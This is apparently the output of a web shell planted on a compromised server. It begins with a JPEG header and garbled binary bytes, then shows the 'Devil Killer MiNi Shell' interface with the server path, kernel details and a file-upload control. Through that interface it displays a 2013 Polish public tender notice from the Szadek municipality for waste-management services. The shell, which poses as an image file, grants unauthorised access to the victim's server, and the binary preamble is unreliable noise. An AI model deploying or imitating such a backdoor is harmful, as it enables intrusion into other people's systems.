JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131127/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131127/487436-N-2013.html

<p class="kh_header"><b>Szadek: Postępowanie o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego o wartości powyżej 14 000 Euro, nie przekraczającej 200 000 Euro na usługę wdrożenia systemu monitorowania jakości świadczenia  usług komunalnych oraz strategii edukacji proekologicznej mieszkańców w Gminie Szadek, Wodzierady, Zapolice, Zduńska Wola, Burzenin</b><br>
<b>Numer ogłoszenia: 487436 - 2013; data zamieszczenia: 27.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto  Szadek , ul. Warszawska 3, 98-240 Szadek, woj. łódzkie, tel. 43 8215004, faks 43 8215773.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szadek.bip.cc</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego o wartości powyżej 14 000 Euro, nie przekraczającej 200 000 Euro na usługę wdrożenia systemu monitorowania jakości świadczenia  usług komunalnych oraz strategii edukacji proekologicznej mieszkańców w Gminie Szadek, Wodzierady, Zapolice, Zduńska Wola, Burzenin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.	Na przedmiot zamówienia składają się następujące zadania

Zadanie I Badania ilościowe i jakościowe 

W ramach Części I zamówienia Oferent jest zobowiązany do zebrania oraz analizy danych dotyczących: liczby ludności w gminach objętych projektem, ewidencji umów odpadowych dotychczas funkcjonujących, ilości nieruchomości zamieszkałych w gminie, częstotliwość opróżniania koszy,  danych statystycznych o ilości odpadów wytwarzanych przez mieszkańca, które będą stanowiły punkt wyjścia do policzenia kosztów systemu gospodarki odpadami na terenie gminy, szacunkowej ilości odpadów powstających na terenie gminy i przypuszczalnej struktury odpadów. 

W ramach tego zadania przewiduje się zlecenia następujących czynności :
a) Badania ankietowe wśród mieszkańców 
	- Opracowanie ankiety dla badania ankietowego realizowanego przez gminy
	- Wskazanie grupy badawczej na podstawie danych udostępnionych przez Gminy
	- Analiza wyników ankiety oraz opracowanie raportu
b) Badanie dane ewidencyjne dostępne w gminie oraz w przedsiębiorstwach komunalnych - zebranie danych oraz opracowanie raportu
c) Dane statystyczne GUS, Program Gospodarki Odpadami Województwa Łódzkiego - pozyskanie danych oraz analiza wyników
d) zbiorcze opracowanie wyników badań


Zadanie II Ekspertyzy i badania ilościowe

W ramach zamówienia usługodawca będzie zobowiązany do opracowania metodologii badania ilościowego uwzględniającej liczbę i strukturę mieszkańców, deklaracje segregacji odpadów, zróżnicowanie systemów segregacji, oraz sposobów naliczania opłat w gminach objętych projektem. Badanie ilościowe ma polegać  na zweryfikowaniu morfologii odpadów 
i ilości odpadów w poszczególnych gminach. Usługodawca po przeprowadzeniu badania zgodnie z zaproponowaną metodologią będzie zobowiązany do opracowania raportu z tych badań.

Badania zawarte w części I i II zamówienia mają na celu opracowanie kryteriów różnicujących opłaty za usługi jak również pozwalające zaplanować logistykę wywozu 
i metodologię segregacji odpadów oraz opracować złożenia do wyboru podwykonawców świadczących usługi wysokiej jakości.
Raporty i analizy mają na celu dostarczenie pełnych danych do opracowania kompleksowego modelu świadczenia usług komunalnych wysokiej jakości w zakresie gospodarki odpadami.

Zadanie III 

Na podstawie wyników badań i analiz z zadań I i II planowane jest przygotowanie kryteriów dla opracowania modelu świadczenia usług komunalnych. Stworzenie założeń do modelu ma się odbyć w ramach sesji roboczych pracowników gmin z ekspertami zapewnionymi przez oferenta. W ramach usługi oferent zobowiązuje się zapewnić 2 ekspertów o kwalifikacjach opisanych, poniżej którzy wezmą udział w trzech sześciogodzinnych spotkaniach roboczych realizowanych na terenie gminy Szadek.
Po spotkaniach roboczych eksperci ze strony Oferenta opracują minimalny zakres informacji, który musi posiąść gmina, aby modyfikować wypracowany model i dostosować go do swoich potrzeb.
 
Minimalny zakres informacji będzie służył do aktualizacji założeń modelu. Wyodrębnienie kluczowych informacji uzyskanych z badań, które są niezbędne do opracowania modelu pozwoli weryfikować jakość modelu a tym samym poziom świadczonych usług w przyszłości.

Zadanie IV	

W ramach projektu zostaną zorganizowane dwie konferencję. Oferent w ramach usługi zapewni co najmniej 3 prelegentów na każdą konferencję o kompetencjach opisanych poniżej. 
1). Pierwsza konferencja planowana jest w I kwartale 2014 i będzie dotyczyła przedstawienia  minimalnego zakresu informacji które są niezbędne do opracowania modelu świadczenia usług komunalnych. Na konferencję zostaną zaproszeni przedstawiciele władz lokalnych, eksperci, przedstawiciele NGO oraz  przedsiębiorców.
2). Druga konferencja  ma na celu podsumowanie projektu oraz jego wyniki. Na konferencję zostaną zaproszeni przedstawiciele innych gmin. Zaprezentowane będą dobre praktyki stosowane w innych gminach. 

Zadanie V

Stworzenie modelu świadczenia usług komunalnych w zakresie gospodarki odpadami. Oferent zapewni 2 ekspertów na spotkania robocze kierownictwa i pracowników gmin w celu opracowania modelu. W ramach usługi przewidziany jest 5 sześciogodzinnych spotkań. Wymagane kompetencje ekspertów zostały opisane poniżej
Na podstawie ustaleń ze spotkań eksperci zapewnieni przez oferenta stworzą raport opisujący model.

Zadanie VI 

W ramach projektu model świadczenia usług komunalnych w zakresie gospodarki odpadami zostanie poddany konsultacjom społecznym.
Oferent zapewni obsługę merytoryczną konsultacji w postaci dyżuru eksperta o kwalifikacjach opisanych poniżej. W ramach konsultacji przewidujemy 30 godzin dyżuru realizowanych na terenie gmin biorących udział w projekcie.

Zadanie VII 
   
W ramach Zadania VII zaplanowano weryfikację modelu w wyniku konsultacji społecznych. Podczas spotkań roboczych pracowników gmin i ekspertów zostaną omówione kwestię poruszone podczas konsultacji społecznych. W ramach usługi oferent zapewni 2 ekspertów o kwalifikacjach opisanych poniżej na 3 sześciogodzinne spotkania. 
Na podstawie wyników konsultacji oraz ustaleń z sesji roboczych eksperci zapewnieni przez oferenta opracują ostateczną wersję modelu świadczenia usług komunalnych w zakresie gospodarki odpadami uwzględniającego kwestię / uwagi wskazane podczas konsultacji społecznych.
Oferent w ramach części VII zapewni udział 2 ekspertów o kompetencjach opisanych poniżej na minimum 4 spotkania sześciogodzinne w celu opracowanie systemu monitorowania modelu tj. zestawu wskaźników wraz metodologią ich pozyskiwania oraz harmonogramem pomiarów. Na podstawie ustaleń z sesji roboczych eksperci przygotują listy wskaźników wraz z metodologią i harmonogramem pomiaru.


Zadanie VIII Ewaluacja modelu i działania informacyjne

W ramach usługi oferent przeprowadzi ewaluację modelu poprzez wstępny pomiar wskaźników do monitorowania jakości systemu pół roku po jego wdrożeniu tj. 10.2014 w celu oceny i ewentualnej weryfikacji.
Na podstawie wcześniej opracowanych analiz i raportów oferent opracuje zawartość merytoryczną materiałów informacyjnych dotyczących projektu. 

3. Informacje ogólne:
Realizacja zamówienia odbywać się będzie z udziałem osób posiadających następujące wykształcenie i doświadczenie:
1.Co najmniej jedna osoba z wykształceniem wyższym w zakresie nauk społecznych z doświadczeniem w prowadzeniu co najmniej 3 badań społecznych dotyczących usług publicznych realizowanych przez  JST, na grupie co najmniej 150 osób.
2.Co najmniej 1 osoba z wykształceniem doktoranckim w zakresie nauk ekonomicznych posiadająca 3 letnie doświadczenie w doradztwie dla JST w zakresie gospodarowania odpadami komunalnymi.
3.Co najmniej 2 osoby z wykształceniem wyższym posiadające 3 letnie doświadczenie 
w zakresie wdrażania systemów gospodarowania odpadami komunalnymi, oraz audytu tych systemów.
4.Co najmniej jedna osoba posiadająca 3 letnie doświadczeniem w zakresie prowadzenia spotkań publicznych oraz szkoleń dla mieszkańców gmin dotyczących gospodarowania odpadami komunalnymi.
UWAGA
W ramach realizacji zadań: nr III, IV, V, VI i VII Zamawiający zastrzega sobie prawo wskazania ekspertów o których mowa w pkt 3 (Informacje ogólne), którzy będą uczestniczyć w czynnościach przedstawionych w rozdziale I SIWZ (Opis przedmiotu zamówienia) dla poszczególnych zadań..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.30.00.00-5, 73.10.00.00-3, 79.30.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia tego warunku, Wykonawca obowiązany jest wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert wykonał minimum cztery usługi obejmujące swoim zakresem:
opracowanie strategii rozwoju dla jednostki samorządu terytorialnego,
prowadzenie działań promujących rozwiązania ekologiczne,
prowadzenie długofalowych działań (minimum przez okres 6 miesięcy) informacyjnych i szkoleniowych dotyczących selektywnej gospodarki odpadami komunalnymi,
przy czym wartość każdej z usług musi wynosić minimum 25 000 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek dysponowania osobami zdolnymi do wykonania zamówienia jeżeli wykaże, że:
Dysponuje co najmniej jedną osoba z wykształceniem wyższym w zakresie nauk społecznych z doświadczeniem w prowadzeniu co najmniej 3 badań społecznych dotyczących usług publicznych realizowanych przez  JST, na grupie co najmniej 150 osób,
Dysponuje co najmniej 1 osoba z wykształceniem doktoranckim w zakresie nauk ekonomicznych posiadająca 3 letnie doświadczenie w doradztwie dla JST w zakresie gospodarowania odpadami komunalnymi,
Dysponuje co najmniej 2 osobami z wykształceniem wyższym posiadające 3 letnie doświadczenie w zakresie wdrażania systemów gospodarowania odpadami komunalnymi, oraz audytu tych systemów.
Dysponują co najmniej jedną osobą posiadającą 3 letnie doświadczeniem 
w zakresie prowadzenia spotkań publicznych oraz szkoleń dla mieszkańców gmin dotyczących gospodarowania odpadami komunalnymi</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku zostanie dokonana na podstawie złożonego załącznika nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca obowiązany jest wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert wykonał minimum cztery usługi obejmujące swoim zakresem:
opracowanie strategii rozwoju dla jednostki samorządu terytorialnego,
prowadzenie działań promujących rozwiązania ekologiczne,
prowadzenie długofalowych działań (minimum przez okres 6 miesięcy) informacyjnych i szkoleniowych dotyczących selektywnej gospodarki odpadami komunalnymi,
przy czym wartość każdej z usług musi wynosić minimum 25 000 zł brutto;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szadek.bip.cc<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta Szadek
ul. Warszawska 3
98-240 Szadek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2013 godzina 10:00, miejsce: Urząd Gminy i Miasta Szadek
ul. Warszawska 3
98-240 Szadek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu Razem dla Ekologii dofinansowanego ze środków Programu Operacyjnego Pomoc Techniczna...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com